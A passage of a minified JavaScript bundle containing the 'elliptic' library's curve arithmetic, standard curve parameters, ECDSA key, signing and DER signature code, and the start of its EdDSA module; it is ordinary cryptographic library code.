this.x=this.x.redMul(this.z.redInvm()),this.z=this.curve.one,this},Q.prototype.getX=function(){return this.normalize(),this.x.fromRed()}},396:(Pe,we,de)=>{"use strict";var ie=de(7e3),j=de(1959),$=de(2270),ae=de(3654),I=ie.assert;function Q(g){ae.call(this,"short",g),this.a=new j(g.a,16).toRed(this.red),this.b=new j(g.b,16).toRed(this.red),this.tinv=this.two.redInvm(),this.zeroA=0===this.a.fromRed().cmpn(0),this.threeA=0===this.a.fromRed().sub(this.p).cmpn(-3),this.endo=this._getEndomorphism(g),this._endoWnafT1=new Array(4),this._endoWnafT2=new Array(4)}function F(g,b,_,y){ae.BasePoint.call(this,g,"affine"),null===b&&null===_?(this.x=null,this.y=null,this.inf=!0):(this.x=new j(b,16),this.y=new j(_,16),y&&(this.x.forceRed(this.curve.red),this.y.forceRed(this.curve.red)),this.x.red||(this.x=this.x.toRed(this.curve.red)),this.y.red||(this.y=this.y.toRed(this.curve.red)),this.inf=!1)}function E(g,b,_,y){ae.BasePoint.call(this,g,"jacobian"),null===b&&null===_&&null===y?(this.x=this.curve.one,this.y=this.curve.one,this.z=new j(0)):(this.x=new j(b,16),this.y=new j(_,16),this.z=new j(y,16)),this.x.red||(this.x=this.x.toRed(this.curve.red)),this.y.red||(this.y=this.y.toRed(this.curve.red)),this.z.red||(this.z=this.z.toRed(this.curve.red)),this.zOne=this.z===this.curve.one}$(Q,ae),Pe.exports=Q,Q.prototype._getEndomorphism=function(b){if(this.zeroA&&this.g&&this.n&&1===this.p.modn(3)){var _,y;if(b.beta)_=new j(b.beta,16).toRed(this.red);else{var M=this._getEndoRoots(this.p);_=(_=M[0].cmp(M[1])<0?M[0]:M[1]).toRed(this.red)}if(b.lambda)y=new j(b.lambda,16);else{var p=this._getEndoRoots(this.n);0===this.g.mul(p[0]).x.cmp(this.g.x.redMul(_))?y=p[0]:I(0===this.g.mul(y=p[1]).x.cmp(this.g.x.redMul(_)))}return{beta:_,lambda:y,basis:b.basis?b.basis.map(function(w){return{a:new j(w.a,16),b:new j(w.b,16)}}):this._getEndoBasis(y)}}},Q.prototype._getEndoRoots=function(b){var _=b===this.p?this.red:j.mont(b),y=new j(2).toRed(_).redInvm(),M=y.redNeg(),p=new j(3).toRed(_).redNeg().redSqrt().redMul(y);return[M.redAdd(p).fromRed(),M.redSub(p).fromRed()]},Q.prototype._getEndoBasis=function(b){for(var S,O,U,K,ee,se,ve,ye,z,_=this.n.ushrn(Math.floor(this.n.bitLength()/2)),y=b,M=this.n.clone(),p=new j(1),D=new j(0),w=new j(0),x=new j(1),le=0;0!==y.cmpn(0);){var l=M.div(y);ye=M.sub(l.mul(y)),z=w.sub(l.mul(p));var f=x.sub(l.mul(D));if(!U&&ye.cmp(_)<0)S=ve.neg(),O=p,U=ye.neg(),K=z;else if(U&&2==++le)break;ve=ye,M=y,y=ye,w=p,p=z,x=D,D=f}ee=ye.neg(),se=z;var A=U.sqr().add(K.sqr());return ee.sqr().add(se.sqr()).cmp(A)>=0&&(ee=S,se=O),U.negative&&(U=U.neg(),K=K.neg()),ee.negative&&(ee=ee.neg(),se=se.neg()),[{a:U,b:K},{a:ee,b:se}]},Q.prototype._endoSplit=function(b){var _=this.endo.basis,y=_[0],M=_[1],p=M.b.mul(b).divRound(this.n),D=y.b.neg().mul(b).divRound(this.n),w=p.mul(y.a),x=D.mul(M.a),S=p.mul(y.b),O=D.mul(M.b);return{k1:b.sub(w).sub(x),k2:S.add(O).neg()}},Q.prototype.pointFromX=function(b,_){(b=new j(b,16)).red||(b=b.toRed(this.red));var y=b.redSqr().redMul(b).redIAdd(b.redMul(this.a)).redIAdd(this.b),M=y.redSqrt();if(0!==M.redSqr().redSub(y).cmp(this.zero))throw new Error("invalid point");var p=M.fromRed().isOdd();return(_&&!p||!_&&p)&&(M=M.redNeg()),this.point(b,M)},Q.prototype.validate=function(b){if(b.inf)return!0;var _=b.x,y=b.y,M=this.a.redMul(_),p=_.redSqr().redMul(_).redIAdd(M).redIAdd(this.b);return 0===y.redSqr().redISub(p).cmpn(0)},Q.prototype._endoWnafMulAdd=function(b,_,y){for(var M=this._endoWnafT1,p=this._endoWnafT2,D=0;D<b.length;D++){var w=this._endoSplit(_[D]),x=b[D],S=x._getBeta();w.k1.negative&&(w.k1.ineg(),x=x.neg(!0)),w.k2.negative&&(w.k2.ineg(),S=S.neg(!0)),M[2*D]=x,M[2*D+1]=S,p[2*D]=w.k1,p[2*D+1]=w.k2}for(var O=this._wnafMulAdd(1,M,p,2*D,y),U=0;U<2*D;U++)M[U]=null,p[U]=null;return O},$(F,ae.BasePoint),Q.prototype.point=function(b,_,y){return new F(this,b,_,y)},Q.prototype.pointFromJSON=function(b,_){return F.fromJSON(this,b,_)},F.prototype._getBeta=function(){if(this.curve.endo){var b=this.precomputed;if(b&&b.beta)return b.beta;var _=this.curve.point(this.x.redMul(this.curve.endo.beta),this.y);if(b){var y=this.curve,M=function(p){return y.point(p.x.redMul(y.endo.beta),p.y)};b.beta=_,_.precomputed={beta:null,naf:b.naf&&{wnd:b.naf.wnd,points:b.naf.points.map(M)},doubles:b.doubles&&{step:b.doubles.step,points:b.doubles.points.map(M)}}}return _}},F.prototype.toJSON=function(){return this.precomputed?[this.x,this.y,this.precomputed&&{doubles:this.precomputed.doubles&&{step:this.precomputed.doubles.step,points:this.precomputed.doubles.points.slice(1)},naf:this.precomputed.naf&&{wnd:this.precomputed.naf.wnd,points:this.precomputed.naf.points.slice(1)}}]:[this.x,this.y]},F.fromJSON=function(b,_,y){"string"==typeof _&&(_=JSON.parse(_));var M=b.point(_[0],_[1],y);if(!_[2])return M;function p(w){return b.point(w[0],w[1],y)}var D=_[2];return M.precomputed={beta:null,doubles:D.doubles&&{step:D.doubles.step,points:[M].concat(D.doubles.points.map(p))},naf:D.naf&&{wnd:D.naf.wnd,points:[M].concat(D.naf.points.map(p))}},M},F.prototype.inspect=function(){return this.isInfinity()?"<EC Point Infinity>":"<EC Point x: "+this.x.fromRed().toString(16,2)+" y: "+this.y.fromRed().toString(16,2)+">"},F.prototype.isInfinity=function(){return this.inf},F.prototype.add=function(b){if(this.inf)return b;if(b.inf)return this;if(this.eq(b))return this.dbl();if(this.neg().eq(b))return this.curve.point(null,null);if(0===this.x.cmp(b.x))return this.curve.point(null,null);var _=this.y.redSub(b.y);0!==_.cmpn(0)&&(_=_.redMul(this.x.redSub(b.x).redInvm()));var y=_.redSqr().redISub(this.x).redISub(b.x),M=_.redMul(this.x.redSub(y)).redISub(this.y);return this.curve.point(y,M)},F.prototype.dbl=function(){if(this.inf)return this;var b=this.y.redAdd(this.y);if(0===b.cmpn(0))return this.curve.point(null,null);var _=this.curve.a,y=this.x.redSqr(),M=b.redInvm(),p=y.redAdd(y).redIAdd(y).redIAdd(_).redMul(M),D=p.redSqr().redISub(this.x.redAdd(this.x)),w=p.redMul(this.x.redSub(D)).redISub(this.y);return this.curve.point(D,w)},F.prototype.getX=function(){return this.x.fromRed()},F.prototype.getY=function(){return this.y.fromRed()},F.prototype.mul=function(b){return b=new j(b,16),this.isInfinity()?this:this._hasDoubles(b)?this.curve._fixedNafMul(this,b):this.curve.endo?this.curve._endoWnafMulAdd([this],[b]):this.curve._wnafMul(this,b)},F.prototype.mulAdd=function(b,_,y){var M=[this,_],p=[b,y];return this.curve.endo?this.curve._endoWnafMulAdd(M,p):this.curve._wnafMulAdd(1,M,p,2)},F.prototype.jmulAdd=function(b,_,y){var M=[this,_],p=[b,y];return this.curve.endo?this.curve._endoWnafMulAdd(M,p,!0):this.curve._wnafMulAdd(1,M,p,2,!0)},F.prototype.eq=function(b){return this===b||this.inf===b.inf&&(this.inf||0===this.x.cmp(b.x)&&0===this.y.cmp(b.y))},F.prototype.neg=function(b){if(this.inf)return this;var _=this.curve.point(this.x,this.y.redNeg());if(b&&this.precomputed){var y=this.precomputed,M=function(p){return p.neg()};_.precomputed={naf:y.naf&&{wnd:y.naf.wnd,points:y.naf.points.map(M)},doubles:y.doubles&&{step:y.doubles.step,points:y.doubles.points.map(M)}}}return _},F.prototype.toJ=function(){return this.inf?this.curve.jpoint(null,null,null):this.curve.jpoint(this.x,this.y,this.curve.one)},$(E,ae.BasePoint),Q.prototype.jpoint=function(b,_,y){return new E(this,b,_,y)},E.prototype.toP=function(){if(this.isInfinity())return this.curve.point(null,null);var b=this.z.redInvm(),_=b.redSqr(),y=this.x.redMul(_),M=this.y.redMul(_).redMul(b);return this.curve.point(y,M)},E.prototype.neg=function(){return this.curve.jpoint(this.x,this.y.redNeg(),this.z)},E.prototype.add=function(b){if(this.isInfinity())return b;if(b.isInfinity())return this;var _=b.z.redSqr(),y=this.z.redSqr(),M=this.x.redMul(_),p=b.x.redMul(y),D=this.y.redMul(_.redMul(b.z)),w=b.y.redMul(y.redMul(this.z)),x=M.redSub(p),S=D.redSub(w);if(0===x.cmpn(0))return 0!==S.cmpn(0)?this.curve.jpoint(null,null,null):this.dbl();var O=x.redSqr(),U=O.redMul(x),K=M.redMul(O),ee=S.redSqr().redIAdd(U).redISub(K).redISub(K),se=S.redMul(K.redISub(ee)).redISub(D.redMul(U)),ve=this.z.redMul(b.z).redMul(x);return this.curve.jpoint(ee,se,ve)},E.prototype.mixedAdd=function(b){if(this.isInfinity())return b.toJ();if(b.isInfinity())return this;var _=this.z.redSqr(),y=this.x,M=b.x.redMul(_),p=this.y,D=b.y.redMul(_).redMul(this.z),w=y.redSub(M),x=p.redSub(D);if(0===w.cmpn(0))return 0!==x.cmpn(0)?this.curve.jpoint(null,null,null):this.dbl();var S=w.redSqr(),O=S.redMul(w),U=y.redMul(S),K=x.redSqr().redIAdd(O).redISub(U).redISub(U),ee=x.redMul(U.redISub(K)).redISub(p.redMul(O)),se=this.z.redMul(w);return this.curve.jpoint(K,ee,se)},E.prototype.dblp=function(b){if(0===b)return this;if(this.isInfinity())return this;if(!b)return this.dbl();var _;if(this.curve.zeroA||this.curve.threeA){var y=this;for(_=0;_<b;_++)y=y.dbl();return y}var M=this.curve.a,p=this.curve.tinv,D=this.x,w=this.y,x=this.z,S=x.redSqr().redSqr(),O=w.redAdd(w);for(_=0;_<b;_++){var U=D.redSqr(),K=O.redSqr(),ee=K.redSqr(),se=U.redAdd(U).redIAdd(U).redIAdd(M.redMul(S)),ve=D.redMul(K),le=se.redSqr().redISub(ve.redAdd(ve)),ye=ve.redISub(le),z=se.redMul(ye);z=z.redIAdd(z).redISub(ee);var l=O.redMul(x);_+1<b&&(S=S.redMul(ee)),D=le,x=l,O=z}return this.curve.jpoint(D,O.redMul(p),x)},E.prototype.dbl=function(){return this.isInfinity()?this:this.curve.zeroA?this._zeroDbl():this.curve.threeA?this._threeDbl():this._dbl()},E.prototype._zeroDbl=function(){var b,_,y;if(this.zOne){var M=this.x.redSqr(),p=this.y.redSqr(),D=p.redSqr(),w=this.x.redAdd(p).redSqr().redISub(M).redISub(D);w=w.redIAdd(w);var x=M.redAdd(M).redIAdd(M),S=x.redSqr().redISub(w).redISub(w),O=D.redIAdd(D);O=(O=O.redIAdd(O)).redIAdd(O),b=S,_=x.redMul(w.redISub(S)).redISub(O),y=this.y.redAdd(this.y)}else{var U=this.x.redSqr(),K=this.y.redSqr(),ee=K.redSqr(),se=this.x.redAdd(K).redSqr().redISub(U).redISub(ee);se=se.redIAdd(se);var ve=U.redAdd(U).redIAdd(U),le=ve.redSqr(),ye=ee.redIAdd(ee);ye=(ye=ye.redIAdd(ye)).redIAdd(ye),b=le.redISub(se).redISub(se),_=ve.redMul(se.redISub(b)).redISub(ye),y=(y=this.y.redMul(this.z)).redIAdd(y)}return this.curve.jpoint(b,_,y)},E.prototype._threeDbl=function(){var b,_,y;if(this.zOne){var M=this.x.redSqr(),p=this.y.redSqr(),D=p.redSqr(),w=this.x.redAdd(p).redSqr().redISub(M).redISub(D);w=w.redIAdd(w);var x=M.redAdd(M).redIAdd(M).redIAdd(this.curve.a),S=x.redSqr().redISub(w).redISub(w);b=S;var O=D.redIAdd(D);O=(O=O.redIAdd(O)).redIAdd(O),_=x.redMul(w.redISub(S)).redISub(O),y=this.y.redAdd(this.y)}else{var U=this.z.redSqr(),K=this.y.redSqr(),ee=this.x.redMul(K),se=this.x.redSub(U).redMul(this.x.redAdd(U));se=se.redAdd(se).redIAdd(se);var ve=ee.redIAdd(ee),le=(ve=ve.redIAdd(ve)).redAdd(ve);b=se.redSqr().redISub(le),y=this.y.redAdd(this.z).redSqr().redISub(K).redISub(U);var ye=K.redSqr();ye=(ye=(ye=ye.redIAdd(ye)).redIAdd(ye)).redIAdd(ye),_=se.redMul(ve.redISub(b)).redISub(ye)}return this.curve.jpoint(b,_,y)},E.prototype._dbl=function(){var b=this.curve.a,_=this.x,y=this.y,M=this.z,p=M.redSqr().redSqr(),D=_.redSqr(),w=y.redSqr(),x=D.redAdd(D).redIAdd(D).redIAdd(b.redMul(p)),S=_.redAdd(_),O=(S=S.redIAdd(S)).redMul(w),U=x.redSqr().redISub(O.redAdd(O)),K=O.redISub(U),ee=w.redSqr();ee=(ee=(ee=ee.redIAdd(ee)).redIAdd(ee)).redIAdd(ee);var se=x.redMul(K).redISub(ee),ve=y.redAdd(y).redMul(M);return this.curve.jpoint(U,se,ve)},E.prototype.trpl=function(){if(!this.curve.zeroA)return this.dbl().add(this);var b=this.x.redSqr(),_=this.y.redSqr(),y=this.z.redSqr(),M=_.redSqr(),p=b.redAdd(b).redIAdd(b),D=p.redSqr(),w=this.x.redAdd(_).redSqr().redISub(b).redISub(M),x=(w=(w=(w=w.redIAdd(w)).redAdd(w).redIAdd(w)).redISub(D)).redSqr(),S=M.redIAdd(M);S=(S=(S=S.redIAdd(S)).redIAdd(S)).redIAdd(S);var O=p.redIAdd(w).redSqr().redISub(D).redISub(x).redISub(S),U=_.redMul(O);U=(U=U.redIAdd(U)).redIAdd(U);var K=this.x.redMul(x).redISub(U);K=(K=K.redIAdd(K)).redIAdd(K);var ee=this.y.redMul(O.redMul(S.redISub(O)).redISub(w.redMul(x)));ee=(ee=(ee=ee.redIAdd(ee)).redIAdd(ee)).redIAdd(ee);var se=this.z.redAdd(w).redSqr().redISub(y).redISub(x);return this.curve.jpoint(K,ee,se)},E.prototype.mul=function(b,_){return b=new j(b,_),this.curve._wnafMul(this,b)},E.prototype.eq=function(b){if("affine"===b.type)return this.eq(b.toJ());if(this===b)return!0;var _=this.z.redSqr(),y=b.z.redSqr();if(0!==this.x.redMul(y).redISub(b.x.redMul(_)).cmpn(0))return!1;var M=_.redMul(this.z),p=y.redMul(b.z);return 0===this.y.redMul(p).redISub(b.y.redMul(M)).cmpn(0)},E.prototype.eqXToP=function(b){var _=this.z.redSqr(),y=b.toRed(this.curve.red).redMul(_);if(0===this.x.cmp(y))return!0;for(var M=b.clone(),p=this.curve.redN.redMul(_);;){if(M.iadd(this.curve.n),M.cmp(this.curve.p)>=0)return!1;if(y.redIAdd(p),0===this.x.cmp(y))return!0}},E.prototype.inspect=function(){return this.isInfinity()?"<EC JPoint Infinity>":"<EC JPoint x: "+this.x.toString(16,2)+" y: "+this.y.toString(16,2)+" z: "+this.z.toString(16,2)+">"},E.prototype.isInfinity=function(){return 0===this.z.cmpn(0)}},1915:(Pe,we,de)=>{"use strict";var E,ie=we,j=de(8414),$=de(6186),I=de(7e3).assert;function Q(g){this.curve="short"===g.type?new $.short(g):"edwards"===g.type?new $.edwards(g):new $.mont(g),this.g=this.curve.g,this.n=this.curve.n,this.hash=g.hash,I(this.g.validate(),"Invalid curve"),I(this.g.mul(this.n).isInfinity(),"Invalid curve, G*N != O")}function F(g,b){Object.defineProperty(ie,g,{configurable:!0,enumerable:!0,get:function(){var _=new Q(b);return Object.defineProperty(ie,g,{configurable:!0,enumerable:!0,value:_}),_}})}ie.PresetCurve=Q,F("p192",{type:"short",prime:"p192",p:"ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff",a:"ffffffff ffffffff ffffffff fffffffe ffffffff fffffffc",b:"64210519 e59c80e7 0fa7e9ab 72243049 feb8deec c146b9b1",n:"ffffffff ffffffff ffffffff 99def836 146bc9b1 b4d22831",hash:j.sha256,gRed:!1,g:["188da80e b03090f6 7cbf20eb 43a18800 f4ff0afd 82ff1012","07192b95 ffc8da78 631011ed 6b24cdd5 73f977a1 1e794811"]}),F("p224",{type:"short",prime:"p224",p:"ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001",a:"ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff fffffffe",b:"b4050a85 0c04b3ab f5413256 5044b0b7 d7bfd8ba 270b3943 2355ffb4",n:"ffffffff ffffffff ffffffff ffff16a2 e0b8f03e 13dd2945 5c5c2a3d",hash:j.sha256,gRed:!1,g:["b70e0cbd 6bb4bf7f 321390b9 4a03c1d3 56c21122 343280d6 115c1d21","bd376388 b5f723fb 4c22dfe6 cd4375a0 5a074764 44d58199 85007e34"]}),F("p256",{type:"short",prime:null,p:"ffffffff 00000001 00000000 00000000 00000000 ffffffff ffffffff ffffffff",a:"ffffffff 00000001 00000000 00000000 00000000 ffffffff ffffffff fffffffc",b:"5ac635d8 aa3a93e7 b3ebbd55 769886bc 651d06b0 cc53b0f6 3bce3c3e 27d2604b",n:"ffffffff 00000000 ffffffff ffffffff bce6faad a7179e84 f3b9cac2 fc632551",hash:j.sha256,gRed:!1,g:["6b17d1f2 e12c4247 f8bce6e5 63a440f2 77037d81 2deb33a0 f4a13945 d898c296","4fe342e2 fe1a7f9b 8ee7eb4a 7c0f9e16 2bce3357 6b315ece cbb64068 37bf51f5"]}),F("p384",{type:"short",prime:null,p:"ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe ffffffff 00000000 00000000 ffffffff",a:"ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe ffffffff 00000000 00000000 fffffffc",b:"b3312fa7 e23ee7e4 988e056b e3f82d19 181d9c6e fe814112 0314088f 5013875a c656398d 8a2ed19d 2a85c8ed d3ec2aef",n:"ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff c7634d81 f4372ddf 581a0db2 48b0a77a ecec196a ccc52973",hash:j.sha384,gRed:!1,g:["aa87ca22 be8b0537 8eb1c71e f320ad74 6e1d3b62 8ba79b98 59f741e0 82542a38 5502f25d bf55296c 3a545e38 72760ab7","3617de4a 96262c6f 5d9e98bf 9292dc29 f8f41dbd 289a147c e9da3113 b5f0b8c0 0a60b1ce 1d7e819d 7a431d7c 90ea0e5f"]}),F("p521",{type:"short",prime:null,p:"000001ff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff",a:"000001ff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffc",b:"00000051 953eb961 8e1c9a1f 929a21a0 b68540ee a2da725b 99b315f3 b8b48991 8ef109e1 56193951 ec7e937b 1652c0bd 3bb1bf07 3573df88 3d2c34f1 ef451fd4 6b503f00",n:"000001ff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffa 51868783 bf2f966b 7fcc0148 f709a5d0 3bb5c9b8 899c47ae bb6fb71e 91386409",hash:j.sha512,gRed:!1,g:["000000c6 858e06b7 0404e9cd 9e3ecb66 2395b442 9c648139 053fb521 f828af60 6b4d3dba a14b5e77 efe75928 fe1dc127 a2ffa8de 3348b3c1 856a429b f97e7e31 c2e5bd66","00000118 39296a78 9a3bc004 5c8a5fb4 2c7d1bd9 98f54449 579b4468 17afbd17 273e662c 97ee7299 5ef42640 c550b901 3fad0761 353c7086 a272c240 88be9476 9fd16650"]}),F("curve25519",{type:"mont",prime:"p25519",p:"7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed",a:"76d06",b:"1",n:"1000000000000000 0000000000000000 14def9dea2f79cd6 5812631a5cf5d3ed",hash:j.sha256,gRed:!1,g:["9"]}),F("ed25519",{type:"edwards",prime:"p25519",p:"7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed",a:"-1",c:"1",d:"52036cee2b6ffe73 8cc740797779e898 00700a4d4141d8ab 75eb4dca135978a3",n:"1000000000000000 0000000000000000 14def9dea2f79cd6 5812631a5cf5d3ed",hash:j.sha256,gRed:!1,g:["216936d3cd6e53fec0a4e231fdd6dc5c692cc7609525a7b2c9562d608f25d51a","6666666666666666666666666666666666666666666666666666666666666658"]});try{E=de(5862)}catch(g){E=void 0}F("secp256k1",{type:"short",prime:"k256",p:"ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f",a:"0",b:"7",n:"ffffffff ffffffff ffffffff fffffffe baaedce6 af48a03b bfd25e8c d0364141",h:"1",hash:j.sha256,beta:"7ae96a2b657c07106e64479eac3434e99cf0497512f58995c1396c28719501ee",lambda:"5363ad4cc05c30e0a5261c028812645a122e22ea20816678df02967c1b23bd72",basis:[{a:"3086d221a7d46bcde86c90e49284eb15",b:"-e4437ed6010e88286f547fa90abfe4c3"},{a:"114ca50f7a8e2f3f657c1108d9d44cfd8",b:"3086d221a7d46bcde86c90e49284eb15"}],gRed:!1,g:["79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798","483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8",E]})},7949:(Pe,we,de)=>{"use strict";var ie=de(1959),j=de(8116),$=de(7e3),ae=de(1915),I=de(9598),Q=$.assert,F=de(4602),E=de(7327);function g(b){if(!(this instanceof g))return new g(b);"string"==typeof b&&(Q(Object.prototype.hasOwnProperty.call(ae,b),"Unknown curve "+b),b=ae[b]),b instanceof ae.PresetCurve&&(b={curve:b}),this.curve=b.curve.curve,this.n=this.curve.n,this.nh=this.n.ushrn(1),this.g=this.curve.g,this.g=b.curve.g,this.g.precompute(b.curve.n.bitLength()+1),this.hash=b.hash||b.curve.hash}Pe.exports=g,g.prototype.keyPair=function(_){return new F(this,_)},g.prototype.keyFromPrivate=function(_,y){return F.fromPrivate(this,_,y)},g.prototype.keyFromPublic=function(_,y){return F.fromPublic(this,_,y)},g.prototype.genKeyPair=function(_){_||(_={});for(var y=new j({hash:this.hash,pers:_.pers,persEnc:_.persEnc||"utf8",entropy:_.entropy||I(this.hash.hmacStrength),entropyEnc:_.entropy&&_.entropyEnc||"utf8",nonce:this.n.toArray()}),M=this.n.byteLength(),p=this.n.sub(new ie(2));;){var D=new ie(y.generate(M));if(!(D.cmp(p)>0))return D.iaddn(1),this.keyFromPrivate(D)}},g.prototype._truncateToN=function(_,y){var M=8*_.byteLength()-this.n.bitLength();return M>0&&(_=_.ushrn(M)),!y&&_.cmp(this.n)>=0?_.sub(this.n):_},g.prototype.sign=function(_,y,M,p){"object"==typeof M&&(p=M,M=null),p||(p={}),y=this.keyFromPrivate(y,M),_=this._truncateToN(new ie(_,16));for(var D=this.n.byteLength(),w=y.getPrivate().toArray("be",D),x=_.toArray("be",D),S=new j({hash:this.hash,entropy:w,nonce:x,pers:p.pers,persEnc:p.persEnc||"utf8"}),O=this.n.sub(new ie(1)),U=0;;U++){var K=p.k?p.k(U):new ie(S.generate(this.n.byteLength()));if(!((K=this._truncateToN(K,!0)).cmpn(1)<=0||K.cmp(O)>=0)){var ee=this.g.mul(K);if(!ee.isInfinity()){var se=ee.getX(),ve=se.umod(this.n);if(0!==ve.cmpn(0)){var le=K.invm(this.n).mul(ve.mul(y.getPrivate()).iadd(_));if(0!==(le=le.umod(this.n)).cmpn(0)){var ye=(ee.getY().isOdd()?1:0)|(0!==se.cmp(ve)?2:0);return p.canonical&&le.cmp(this.nh)>0&&(le=this.n.sub(le),ye^=1),new E({r:ve,s:le,recoveryParam:ye})}}}}}},g.prototype.verify=function(_,y,M,p){_=this._truncateToN(new ie(_,16)),M=this.keyFromPublic(M,p);var D=(y=new E(y,"hex")).r,w=y.s;if(D.cmpn(1)<0||D.cmp(this.n)>=0||w.cmpn(1)<0||w.cmp(this.n)>=0)return!1;var U,x=w.invm(this.n),S=x.mul(_).umod(this.n),O=x.mul(D).umod(this.n);return this.curve._maxwellTrick?!(U=this.g.jmulAdd(S,M.getPublic(),O)).isInfinity()&&U.eqXToP(D):!(U=this.g.mulAdd(S,M.getPublic(),O)).isInfinity()&&0===U.getX().umod(this.n).cmp(D)},g.prototype.recoverPubKey=function(b,_,y,M){Q((3&y)===y,"The recovery param is more than two bits"),_=new E(_,M);var p=this.n,D=new ie(b),w=_.r,x=_.s,S=1&y,O=y>>1;if(w.cmp(this.curve.p.umod(this.curve.n))>=0&&O)throw new Error("Unable to find sencond key candinate");w=this.curve.pointFromX(O?w.add(this.curve.n):w,S);var U=_.r.invm(p),K=p.sub(D).mul(U).umod(p),ee=x.mul(U).umod(p);return this.g.mulAdd(K,w,ee)},g.prototype.getKeyRecoveryParam=function(b,_,y,M){if(null!==(_=new E(_,M)).recoveryParam)return _.recoveryParam;for(var p=0;p<4;p++){var D;try{D=this.recoverPubKey(b,_,p)}catch(w){continue}if(D.eq(y))return p}throw new Error("Unable to find valid recovery factor")}},4602:(Pe,we,de)=>{"use strict";var ie=de(1959),$=de(7e3).assert;function ae(I,Q){this.ec=I,this.priv=null,this.pub=null,Q.priv&&this._importPrivate(Q.priv,Q.privEnc),Q.pub&&this._importPublic(Q.pub,Q.pubEnc)}Pe.exports=ae,ae.fromPublic=function(Q,F,E){return F instanceof ae?F:new ae(Q,{pub:F,pubEnc:E})},ae.fromPrivate=function(Q,F,E){return F instanceof ae?F:new ae(Q,{priv:F,privEnc:E})},ae.prototype.validate=function(){var Q=this.getPublic();return Q.isInfinity()?{result:!1,reason:"Invalid public key"}:Q.validate()?Q.mul(this.ec.curve.n).isInfinity()?{result:!0,reason:null}:{result:!1,reason:"Public key * N != O"}:{result:!1,reason:"Public key is not a point"}},ae.prototype.getPublic=function(Q,F){return"string"==typeof Q&&(F=Q,Q=null),this.pub||(this.pub=this.ec.g.mul(this.priv)),F?this.pub.encode(F,Q):this.pub},ae.prototype.getPrivate=function(Q){return"hex"===Q?this.priv.toString(16,2):this.priv},ae.prototype._importPrivate=function(Q,F){this.priv=new ie(Q,F||16),this.priv=this.priv.umod(this.ec.curve.n)},ae.prototype._importPublic=function(Q,F){if(Q.x||Q.y)return"mont"===this.ec.curve.type?$(Q.x,"Need x coordinate"):("short"===this.ec.curve.type||"edwards"===this.ec.curve.type)&&$(Q.x&&Q.y,"Need both x and y coordinate"),void(this.pub=this.ec.curve.point(Q.x,Q.y));this.pub=this.ec.curve.decodePoint(Q,F)},ae.prototype.derive=function(Q){return Q.validate()||$(Q.validate(),"public point not validated"),Q.mul(this.priv).getX()},ae.prototype.sign=function(Q,F,E){return this.ec.sign(Q,this,F,E)},ae.prototype.verify=function(Q,F){return this.ec.verify(Q,F,this)},ae.prototype.inspect=function(){return"<Key priv: "+(this.priv&&this.priv.toString(16,2))+" pub: "+(this.pub&&this.pub.inspect())+" >"}},7327:(Pe,we,de)=>{"use strict";var ie=de(1959),j=de(7e3),$=j.assert;function ae(g,b){if(g instanceof ae)return g;this._importDER(g,b)||($(g.r&&g.s,"Signature without r or s"),this.r=new ie(g.r,16),this.s=new ie(g.s,16),this.recoveryParam=void 0===g.recoveryParam?null:g.recoveryParam)}function I(){this.place=0}function Q(g,b){var _=g[b.place++];if(!(128&_))return _;var y=15&_;if(0===y||y>4)return!1;for(var M=0,p=0,D=b.place;p<y;p++,D++)M<<=8,M|=g[D],M>>>=0;return!(M<=127)&&(b.place=D,M)}function F(g){for(var b=0,_=g.length-1;!g[b]&&!(128&g[b+1])&&b<_;)b++;return 0===b?g:g.slice(b)}function E(g,b){if(b<128)g.push(b);else{var _=1+(Math.log(b)/Math.LN2>>>3);for(g.push(128|_);--_;)g.push(b>>>(_<<3)&255);g.push(b)}}Pe.exports=ae,ae.prototype._importDER=function(b,_){b=j.toArray(b,_);var y=new I;if(48!==b[y.place++])return!1;var M=Q(b,y);if(!1===M||M+y.place!==b.length||2!==b[y.place++])return!1;var p=Q(b,y);if(!1===p)return!1;var D=b.slice(y.place,p+y.place);if(y.place+=p,2!==b[y.place++])return!1;var w=Q(b,y);if(!1===w||b.length!==w+y.place)return!1;var x=b.slice(y.place,w+y.place);if(0===D[0]){if(!(128&D[1]))return!1;D=D.slice(1)}if(0===x[0]){if(!(128&x[1]))return!1;x=x.slice(1)}return this.r=new ie(D),this.s=new ie(x),this.recoveryParam=null,!0},ae.prototype.toDER=function(b){var _=this.r.toArray(),y=this.s.toArray();for(128&_[0]&&(_=[0].concat(_)),128&y[0]&&(y=[0].concat(y)),_=F(_),y=F(y);!(y[0]||128&y[1]);)y=y.slice(1);var M=[2];E(M,_.length),(M=M.concat(_)).push(2),E(M,y.length);var p=M.concat(y),D=[48];return E(D,p.length),D=D.concat(p),j.encode(D,b)}},8593:(Pe,we,de)=>{"use strict";var ie=de(8414),j=de(1915),$=de(7e3),ae=$.assert,I=$.parseBytes,Q=de(993),F=de(2131);function E(g){if(ae("ed25519"===g,"only tested with ed25519 so far"),!(this instanceof E))return new E(g);this.curve=g=j[g].curve,this.g=g.g,this.g.precompute(g.n.bitLength()+1),this.pointClass=g.point().constructor,this.encodingLength=Math.ceil(g.n.bitLength()/8),this.hash=ie.sha512}Pe.exports=E,E.prototype.sign=function(b,_){b=I(b);var y=this.keyFromSecret(_),M=this.hashInt(y.messagePrefix(),b),p=this.g.mul(M),D=this.encodePoint(p),w=this.hashInt(D,y.pubBytes(),b).mul(y.priv()),x=M.add(w).umod(this.curve.n);return this.makeSignature({R:p,S:x,Rencoded:D})},E.prototype.verify=function(b,_,y){b=I(b),_=this.makeSignature(_);var 